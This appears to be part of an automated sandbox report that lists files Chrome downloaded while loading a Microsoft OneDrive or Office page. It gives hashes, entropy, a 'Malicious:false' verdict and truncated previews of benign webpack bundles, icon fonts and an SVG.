                                        Preview:wOFF......;.......d.........................OS/2.......G...`0.s.cmap...P.........q.gasp................glyf......4A..V....head..6X...5...6K...hhea..6........$7.0!hmtx..6....k....-A.Kloca..7..........<.*maxp..7........ ....name..7........O..R.post..;........ ....x.c`.c......j.r...a&.f:..$...bdb..........+(08...U.....`u,...........x.c```f.`..F..x..1..,........%.b.../......./K....../[...r../..<...+.W.._E..}U.........c6T./..:.}9.....o....\_E..../.#T.............].]...].......................Z..#..z....`;U...............x..|.|.....h$.-.e.-[.%y.dIv..I...8....&!$......VvB $.@[......(..J.....W(..P^.Kl..;..%P.....l.....s.9.s.....$D.%o$"Q..V.UvY].H.8>:^xR.._.xK.iB..?F.%~.....|o.&.w...|......?7>.5...j.I.V.Q...A...+(.>,.....:.59E.u.....(.A.#.:.qx..."...{...>...V.FsF..+.z#...C4..G{......y..w.k.~....Z..!.*..#oC....`.Y^%.7..^..1#V.:.~dJ~J...H4.....q{...vB....q#SV>.y...\.~:X.^.n.sc.=...T....T.#.d.YL.&...qxT.$.....(../.<..=....8.c|.1.g.*~.'}..K).w...........2..X..l.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7060)
                                        Category:downloaded
                                        Size (bytes):12989
                                        Entropy (8bit):5.349290970889558
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EAF06FEEF809C7DC01F1C42449CF2F87
                                        SHA1:BF1D6A16E159F2B96B59C431DEBC98D23EEDCA41
                                        SHA-256:E6797447E65AED4B7D14FFBF841ADEF7DAAE3219A3A1C1734330CDCE5E7EED2F
                                        SHA-512:2A1EE394923714648CAD4D41A595B69E71C51FFAB7C88EEA38C7E8B28707CD60FCFC62A1807BCE060F52635B0CE0ACB8469D6472998FB4447C3F95BCD5C26413
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/5.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[5],{8016:function(e,t,n){n.d(t,{a:function(){return E}});var a=n(37),i=n("tslib_102"),r=n("react-lib"),o=n(33),s=n(141),c=n(8017),d=n(4131),l=n(192),u=n(127),f=n(974),p=n("fui.util_369"),m=n(459),_=n(4722),h=(0,o.a)(),b=r.createElement(_.a,null).type,g=function(e){function t(t){var n=e.call(this,t)||this;return(0,u.a)(n),(0,f.a)("DialogContent",t,{titleId:"titleProps.id"}),n}return(0,i.XJ)(t,e),t.prototype.render=function(){var e,t=this.props,n=t.showCloseButton,a=t.className,o=t.closeButtonAriaLabel,s=t.onDismiss,d=t.subTextId,l=t.subText,u=t.titleProps,f=void 0===u?{}:u,_=t.titleId,b=t.title,g=t.type,v=t.styles,y=t.theme,S=t.draggableHeaderClassName,D=h(v,{theme:y,className:a,isLargeHeader:g===c.a.largeHeader,isClose:g===c.a.close,draggableHeaderClassName:S}),I=this._groupChildren();return l&&(e=r.createElement("p",{className:D.subText,id:d},l)),r.createElement("div",{className:D.content},r.createElement("d
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (3517)
                                        Category:downloaded
                                        Size (bytes):9070
                                        Entropy (8bit):5.423899007397972
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E95ADA158B545D81312DA0B659AE722E
                                        SHA1:CD4DDBF53995C78262F510FEF66E6F06BEBDCEDB
                                        SHA-256:16F93874FC801F2B672DBA5CDA143D67BDBA4F85D7E7F3BA5D6ACC44AB05946F
                                        SHA-512:BB715F3668F61FE997F0822006D5BBC4703FA72905B3B4CCD4967F5861AB05E8396BF4347B9C90E2FB1D01B9C04F842FF2C2A71392DE5F0C7421AE34FF8112E4
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/4.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[4],{8027:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("react-lib"),i=n("fui.core_351"),r=n(220),o=n(160),s=n(159);const c=(0,i.pOW)("rhfpeu0",null,{r:[".rhfpeu0{gap:8px;height:fit-content;box-sizing:border-box;display:flex;grid-row-start:3;grid-row-end:3;}"],s:["@media screen and (max-width: 480px){.rhfpeu0{flex-direction:column;justify-self:stretch;}}"]}),d=(0,i.xbz)({gridPositionEnd:{Bdqf98w:"f1a7i8kp",Br312pm:"fd46tj4",Bw0ie65:"fsyjsko",B6n781s:"f1f41i0t",Bv5d0be:"f1jaqex3",v4ugfu:"f2ao6jk"},gridPositionStart:{Bdqf98w:"fsxvdwy",Br312pm:"fwpfdsa",Bw0ie65:"f1e2fz10",Bojbm9c:"f11ihkml",Bv5d0be:"fce5bvx",v4ugfu:"f2ao6jk"},fluidStart:{Bw0ie65:"fsyjsko"},fluidEnd:{Br312pm:"fwpfdsa"}},{d:[".f1a7i8kp{justify-self:end;}",".fd46tj4{grid-column-start:2;}",".fsyjsko{grid-column-end:4;}",".fsxvdwy{justify-self:start;}",".fwpfdsa{grid-column-start:1;}",".f1e2fz10{grid-column-end:2;}"],m:[["@media screen and (
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (6480)
                                        Category:downloaded
                                        Size (bytes):23394
                                        Entropy (8bit):5.33840326385308
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C19080A5D364C6A1BF13DDDB7056AD61
                                        SHA1:F870CA95B529E6187CB3ADC95BDD3E85DECC49E1
                                        SHA-256:F1439EC532384FA0B8541BCD1E29330464C39A010856EA2C883ED7B18B185235
                                        SHA-512:082D0E77E9FD99E3C47691B667DA6F6E7541B7871986F8A2E012AE0ED0D9E8C3EEA117ECA8D9C034DB7357A217AF75CDB5B57CAFF95F1C464C6760CCE7E92CD9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/164.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[164],{3210:function(e,t,n){var a,i;n.d(t,{a:function(){return a},b:function(){return i}}),function(e){e[e.View=0]="View",e[e.Edit=1]="Edit",e[e.Extract=2]="Extract",e[e.Esign=3]="Esign"}(a||(a={})),function(e){e.ExitEditMode="ExitEditMode"}(i||(i={}))}.,2737:function(e,t,n){n.d(t,{a:function(){return p},b:function(){return _},c:function(){return m},d:function(){return g},e:function(){return b},f:function(){return c},g:function(){return s},h:function(){return o},i:function(){return d},j:function(){return l},k:function(){return u},l:function(){return D},m:function(){return S},n:function(){return v},o:function(){return I},p:function(){return y},q:function(){return f},r:function(){return h},s:function(){return i},t:function(){return a},u:function(){return r}});var a=.5,i=5,r=90,o=14,s=3,c=7,d=5,l=5,u=150,f=96,p=100,m=1,_=255,h=1e8,b=255,g="MsPdfViewer.CACHED_DISPLAY_INFO_ARRAY_STORE_KEY",v={r:0,g:81,b:186,a:1},y=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 16776, version 1.3277
                                        Category:downloaded
                                        Size (bytes):16776
                                        Entropy (8bit):7.974961094782676
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C67215019B9FD89B9E29A16916BE5264
                                        SHA1:D4448C620FFA5574ED0FCCBDB1AD2BEE466F136D
                                        SHA-256:1F7216458568F394C796E011CB5DA2285C6D9C919E3D7C224CFD09DF6197AC50
                                        SHA-512:2D111FDDE602CCAB07090B296B485CFE3790BDE13C92A62F5C506EC1D4637B8B53E7A46F15506EB4487D9CAFBF15F066CAEE883292B3E24C7CB5498E05B1C712
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-4-b2f6981b.woff
                                        Preview:wOFF......A.................................OS/2.......G...`/:o.cmap...P........d8b.gasp................glyf......9Q..qLNP..head..<8...6...6#.hhea..<p.......$....hmtx..<....`.....=.ploca..<.........t...maxp..=........ .p./name..=........O..R.post..At....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px..1.....`u,......@t...x...K+.Q...3C............ll..h..,,..\Bb."......B.%Y......PX....._...{....~u.R~..D)...:......n}O.6eSN.3...b.].e..,`.KX.2.....f-...f.....r.C....8...q..\.:...]....<...y.k..|.+...J../..,..&..!...H..K.$I.........P....+d...J..L_..uj_./..o......'....g..EJ....D_..#G...w.:.p.mla./....0.E,`.........N0.q.a.....z..xP.w..F..T."..<.tw.y.l..9.F....;...V...(c.h2BBn.....?......O.6.................x..}....yoU......s......;..\+.....tK+.......... $..F.............8.X.{y.....@...c...c......vgz_..=..+..K..tuwuuu.W.....`......n.,...BX..BXwW9...b^.n......n...^B..pM........G#.(f3y.K..s..{.........v.8..9E..)....N.Ot....M.g../Un..aK.|.."5./y.`0;.`$.(..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (59425)
                                        Category:downloaded
                                        Size (bytes):64758
                                        Entropy (8bit):5.273247792783403
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FA3B663DF4BA8A04E3C9336B821CA9EE
                                        SHA1:8D5907B8A6707FD9090F90A2E672353D5B0E70CE
                                        SHA-256:5357300D4AD4B3A6B35A62AA4943A22F4B36087A0DDFC8270C9DE677D911CF6C
                                        SHA-512:B4EE5133293549B6F14B22FA0CE2089E8CAC9DA29DF7E26E701D26529728BCAAB0D4F7188D98ECD5204EF2ED96985A7105C3B4DD2E9CAD298F672E2A3B9A88D2
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.knockout/odsp.knockout.lib-848c845f.js
                                        Preview:/*! For license information please see odsp.knockout.lib-848c845f.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4715)
                                        Category:downloaded
                                        Size (bytes):18996
                                        Entropy (8bit):5.439119356387553
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3DB8EE0F990FF31ECEB6F7840F017F67
                                        SHA1:EE92AB96AF28598C2AF1A591BAA0C5E8B59396AD
                                        SHA-256:F5C1650D77F0C633AFF821FC9E247BB94F3D21AF8C4C965FA3A9D8EBBB659B3C
                                        SHA-512:818C4484C97D37D56C9FA216B9471163CB34B40FCB68383FF3318762779512E9076ADB66C408C8D7CAF9506229CFEB03F64D5F2647801BF18A0E8819373763FB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/11.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[11],{7821:function(e,t,n){n.d(t,{a:function(){return s}});var a=n(66),i=n(7822),r=n(7820),o=n("odsp.util_460");function s(e){var t,n=e.key,s=n.listFullUrl,c=n.itemId,d=n.rootFolder,l=e.listData,u=l.ListTitle,f=l.ListTemplateType,p=e.pageContext;if(c||d){if(d){var m=(0,r.a)(d,s);m>-1&&(t=d.substring(m+1))}}else t="string"==typeof f&&Number(f)===a.a.mySiteDocumentLibrary?(null==p?void 0:p.isMySiteOwner)||(null==p?void 0:p.isSiteOwner)||!(null==p?void 0:p.webTitle)?i.a:(0,o.OO)(i.b,p.webTitle):u;return t}}.,4096:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return h},c:function(){return _},d:function(){return p},e:function(){return d},f:function(){return u},g:function(){return c},h:function(){return f},i:function(){return l}});var a=n(56),i=n(3518),r=n(1866),o=n(1865),s=n(4095);function c(e){return!!e.RemoteItem}function d(e){return!c(e)&&1===Number(e["Created_x0020_Date.ifnew"])}function l(e){retur
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (3674)
                                        Category:dropped
                                        Size (bytes):4505
                                        Entropy (8bit):4.973960122712231
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:48062B2603A1CB7BE7F16A3CB0E4FA74
                                        SHA1:3BE5F5DAB9FBF6546E18B16704ECD9EEAFF56A54
                                        SHA-256:12DD8F6DAE9CCF775216F7EE488513D6B40EB43A9135C8C64BC69898AA1BAD0E
                                        SHA-512:B001347F64B9B4EBC5212CE60F89B74E1424B8E16369EF8F78876DFDFEA71ABE8A5453F419CE4DA7816B0EBFC191FAE2D4B0D76D69D3FEB5816F3A08B5E97002
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{8025:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return d},d:function(){return o},e:function(){return s},f:function(){return c},g:function(){return u},h:function(){return f},i:function(){return l}});var a=n(4723);const i=(0,a.a)("Delete16Regular","16",["M7 3h2a1 1 0 0 0-2 0ZM6 3a2 2 0 1 1 4 0h4a.5.5 0 0 1 0 1h-.56l-1.2 8.84A2.5 2.5 0 0 1 9.74 15h-3.5a2.5 2.5 0 0 1-2.48-2.16L2.57 4H2a.5.5 0 0 1 0-1h4Zm1 3.5a.5.5 0 0 0-1 0v5a.5.5 0 0 0 1 0v-5ZM9.5 6c.28 0 .5.22.5.5v5a.5.5 0 0 1-1 0v-5c0-.28.22-.5.5-.5Zm-4.74 6.7c.1.75.74 1.3 1.49 1.3h3.5a1.5 1.5 0 0 0 1.5-1.3L12.42 4H3.57l1.19 8.7Z"]),r=(0,a.a)("Delete20Regular","20",["M8.5 4h3a1.5 1.5 0 0 0-3 0Zm-1 0a2.5 2.5 0 0 1 5 0h5a.5.5 0 0 1 0 1h-1.05l-1.2 10.34A3 3 0 0 1 12.27 18H7.73a3 3 0 0 1-2.98-2.66L3.55 5H2.5a.5.5 0 0 1 0-1h5ZM5.74 15.23A2 2 0 0 0 7.73 17h4.54a2 2 0 0 0 1.99-1.77L15.44 5H4.56l1.18 10.23ZM8.5 7.5c.28 0 .5.2
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (7518)
                                        Category:downloaded
                                        Size (bytes):29604
                                        Entropy (8bit):5.396180008958164
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2D678A6742D46DAE60EFE876BFCF748D
                                        SHA1:D1FD2E7FF6F180DAB6BA91D6E958D0D1CCDDBD48
                                        SHA-256:05C564AFFCE18B07B204308040D22FEF5FB4FCB6B1787598B4A37773A4BD9E06
                                        SHA-512:EEDAD9251D952384DD73885900975FC196A541928CC6B4C473175509C0E2C0C37D612EF7F78C553B5C8BFBA1DE2A2693B12CA0E8CCB6FD2A0197E315289156F9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/69.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[69],{2596:function(e,t,n){n.d(t,{a:function(){return l}});var a=n("react-lib"),i=n(160),r=n(159),o=n("fui.core_351"),s=n(220);const c=(0,o.xbz)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"fzkkow9",vrafjx:["fcdblym","fjik90z"],oivjwe:"fg706s2",wvpqe5:["fjik90z","fcdblym"],B4j52fo:"f192inf7",Bekrc4i:["f5tn483","f1ojsxk5"],Bn0qgzm:"f1vxd6vx",ibv6hh:["f1ojsxk5","f5tn483"]},circular:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f44lkw9"},rounded:{Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"ft85np5"},square:{},shadow:{E5pizo:"f1whvlc6"},center:{st4lth:"f1plgu50",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},contain:{st4lth:"f1kle4es",Ermj5k:"f14xojzb",Bqenvij:"f1l02sjl",a9b677:"fly5x3f"},default:{},cover:{st4lth:"f1ps3kmd",Ermj5k
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (12213)
                                        Category:downloaded
                                        Size (bytes):22066
                                        Entropy (8bit):5.216324065020321
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A3EFA2C2548946130A0CF48328B0E19C
                                        SHA1:AF43475E7D4E25BFEDE0A9646CC2B980F95C1EEE
                                        SHA-256:0759AF1679ABBE997194CD7915992736857A5B295AE8B1E6D1B7E27146E7B01C
                                        SHA-512:E8CC047A75C9CB89DA6821F71160F555DF7B88753FCCF359E461B2B1B38E784799265F578B770A1056715FB19C38AD72D03D1EAF81BFE08B9B125CE189AB2D59
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/24.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[24],{8119:function(e,t,n){n.d(t,{a:function(){return l}});var a=n(37),i=n(46),r={root:"ms-groupFooter"},o=n("react-lib"),s=n(33),c=n(1120),d=(0,s.a)(),l=(0,a.a)(function(e){var t=e.group,n=e.groupLevel,a=e.footerText,i=e.indentWidth,r=e.styles,s=e.theme,l=d(r,{theme:s});return t&&a?o.createElement("div",{className:l.root},o.createElement(c.a,{indentWidth:i,count:n}),a):null},function(e){var t=e.theme,n=e.className,a=(0,i.e)(r,t);return{root:[t.fonts.medium,a.root,{position:"relative",padding:"5px 38px"},n]}},void 0,{scope:"GroupFooter"})}.,8117:function(e,t,n){n.d(t,{a:function(){return x}});var a=n(37),i=n(46),r=n("fui.core_351"),o=n("fui.util_369"),s=n(393),c=n(2066),d=n(1120),l={root:"ms-GroupHeader",compact:"ms-GroupHeader--compact",check:"ms-GroupHeader-check",dropIcon:"ms-GroupHeader-dropIcon",expand:"ms-GroupHeader-expand",isCollapsed:"is-collapsed",title:"ms-GroupHeader-title",isSelected:"is-selected"
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (20776)
                                        Category:dropped
                                        Size (bytes):20781
                                        Entropy (8bit):5.159052063176012
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0AA5E5B5AB32208246C4CD8AF3A564E9
                                        SHA1:FF29100903051F0D7B0EC330DB72B15D3EFF32F9
                                        SHA-256:FF8592F23174C2DEDF033ACAB53839859650D96D3A373B22A57A67979D9681B0
                                        SHA-512:2A6880C5BFEC6351875347D42C9EA1B411EBD87B69903C3D5D482DE5665DA982B052EE7BD9893259A3D344834A06C12386F5A75B8376AFB92EC1C5638CD6C643
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1876],{5589:function(e,t,n){n.r(t),n.d(t,{PushNotifier:function(){return F}});var a=n("tslib_102"),i=n(10),r=n(105),o=n("odsp.util_460"),s=n(4301),c=n(35),d="PushNotifier",l="".concat(d,".SocketIoAPI"),u="".concat(d,".SocketIoAPI.GetToken"),f="".concat(d,".WebSocketConnect"),p="".concat(f,".ExceedMaxRetryLimit"),m="".concat(f,".HasPendingConnect"),_="".concat(d,".SocketIoConnect"),h="".concat(d,".SocketIoDisconnect"),b="".concat(d,".SocketIoServerDisconnect"),g="".concat(d,".SessionConnect"),v="".concat(d,".SessionDisconnect"),y="".concat(d,".SubmitUpdate"),S="".concat(y,".BeforeConnect"),D="".concat(y,".Missing"),I="".concat(y,".ERROR"),x="".concat(d,".Coauthoring"),C=[429,503],O=[403,404,400];function w(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];e.forEach(function(e){return e.apply(void 0,t)})}var E=function(e,t){if(null!==t&&"object"==typeof t){var n=Object.getOwnPropertyNames(t),a={};r
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 11912, version 1.3277
                                        Category:downloaded
                                        Size (bytes):11912
                                        Entropy (8bit):7.968259599398078
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:94446D146BDE9A53EEEE642FEB9827EF
                                        SHA1:7C4A74A01891152B56F5B52EE6774E42147A1CAD
                                        SHA-256:3E5970851F7278B6A66DCC9359001A0C722BBEAFB7B4262A908612BF367DA2CB
                                        SHA-512:F4E2BEDFAC87484124848D3D3EC5F45A4D659B05B3E916C9F2C6853183B70878FC215937F186DE22FF9F81610124A9B69E91F718983A0CE3A90659CA5AE17FEE
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-15-bd6f8a54.woff
                                        Preview:wOFF..............WD........................OS/2.......G...`;.q.cmap...P.......R+."%gasp...4............glyf...@..&...H@....head..)@...5...6#...hhea..)x.......$....hmtx..)....Y.... i..loca..)..........D..maxp..*........ ....name..*........O..R.post...t....... ....x.c`a..8...........L..t.!.I.(......@9......VP`p.,.y&...!...X <....C{...x...=K.a...s.....P..5I6....f..@e~.&....(...ji.+H... .. E...y.y..>.K..s....3......mn.7..!..w.26l1.3.$...a...,.f..YVYg.M..a..{.S..cN8..9.\r..f....H...%/...V$.T........U...E...'}..G}...=.V-..Fw..*j..g.....*..u..F.g......{.............x..{yx....3..yAF...lK.$c.*...6....@ ....%$a...B`B. ...M..G.&.}}.kV.Vi.4i_..5..4.K..B7lk.....eC..}}...-.s.s.g.GD ..b.M.HD..B.^..uzm.%|.4}....Ni.=..A.D.O....J.$...D..Y.C..}.P.....l..rxu...:.%...r!RS..0.8..p..@......QG.J.......O~......'.m=..C.b....zv...?>.>....1..s.h0//...~..?>y{G.......dqLu.&h....]..;.l..bl=.u..W.^...j.B...un..f>.o..e~y.N.!....3.`N...I.|j...\2..v...';....y.0.uf9....&!...\........U
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (63603)
                                        Category:dropped
                                        Size (bytes):130559
                                        Entropy (8bit):5.272254843138107
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:87C1E4F634CF6F8AAAC8D0B54E18BC68
                                        SHA1:746F885FD663A7B7F0B621C8FF8763F06A52B0A8
                                        SHA-256:FB72ECE0B308948CC31DA5824E484070C21BD9EB6451179BACAB79C99BADC953
                                        SHA-512:F1C741606B3A320FA60114A67A40A9ABC642B768CEE44CFF471BE2426B55083ED46DEDD712C3008790657D05D30436DA61E64C7D6BB3BFF2C86A1EDE39BD4F91
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! For license information please see odsp.react.lib-aa551099.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_13:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.cal
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (10633)
                                        Category:dropped
                                        Size (bytes):18832
                                        Entropy (8bit):5.657786275904342
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DCA3DC8083AD6735DA9CBE95686FFD42
                                        SHA1:B73AE9F8011BE1C997A43A1FDFD284223C15EE8E
                                        SHA-256:97F7D2E4F4C97EDB2A7064F8EA943A281A59F48C91E99F35603F65C7A50A592B
                                        SHA-512:19D406B64ED1AB34AE9D3EF5E695818E5D0C679A112C00B3CC206438C848FB1175AC76C063A39B924836C1B1D1807559554CB1C4F0B29831373A09A5E4AAD69E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[81],{6004:function(e,t,n){n.d(t,{a:function(){return f},b:function(){return p}});var a=n("odsp.util_460"),i=n(85),r="Stream",o=1855,s={FluentUIV9ShimOverallControl:60077,FluentUIV9ShimDefaultButton:60337,FluentUIV9ShimPrimaryButton:60344,FluentUIV9ShimIconButton:60355,FluentUIV9ShimActionButton:60356,FluentUIV9ShimImage:60357,FluentUIV9ShimToggle:60461,FluentUIV9ShimCommandBarButton:60466,FluentUIV9ShimCommandBar:60480,FluentUIV9ShimCommandButton:60501,FluentUIV9ShimTooltipHost:60634,FluentUIV9ShimTooltip:60633,FluentUIV9ShimLink:60405,FluentUIV9ShimStack:60413,FluentUIV9ShimCheckbox:60414,FluentUIV9ShimDialog:60426,FluentUIV9ShimChoiceGroup:60415,FluentUIV9ShimPersona:60419,FluentUIV9ShimFacepile:60569,FluentUIV9ShimPivot:60105,FluentUIV9ShimContextualMenu:60556,FluentUIV9ShimOverlay:60547,FluentUIV9ShimOverflowSet:60555,FluentUIV9ShimIcon:60446,FluentUIV9ShimSpinner:60450,FluentUIV9ShimSlider:60454,FluentUI
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                        Category:downloaded
                                        Size (bytes):2407
                                        Entropy (8bit):7.900400471609788
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg
                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (36585)
                                        Category:dropped
                                        Size (bytes):38785
                                        Entropy (8bit):5.320850706436472
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FA0A1D5560D453DCB54B55414C382C63
                                        SHA1:7D41262CA31129BC33DD1D394F41C22E299FB542
                                        SHA-256:AA55A0D7E7066EDB8632031E4ACEC81282C1174BAF4B15A971DB446E0BF899A0
                                        SHA-512:A11D037687C5BC45BF9B559771A06F1E089607EA844455C378D5B64EB38747CAE3E44B30D9F81211398FBD737592AC09E46E8AC36C3F254CA52DC0119C43579D
                                        Malicious:false
                                        Reputation:unknown
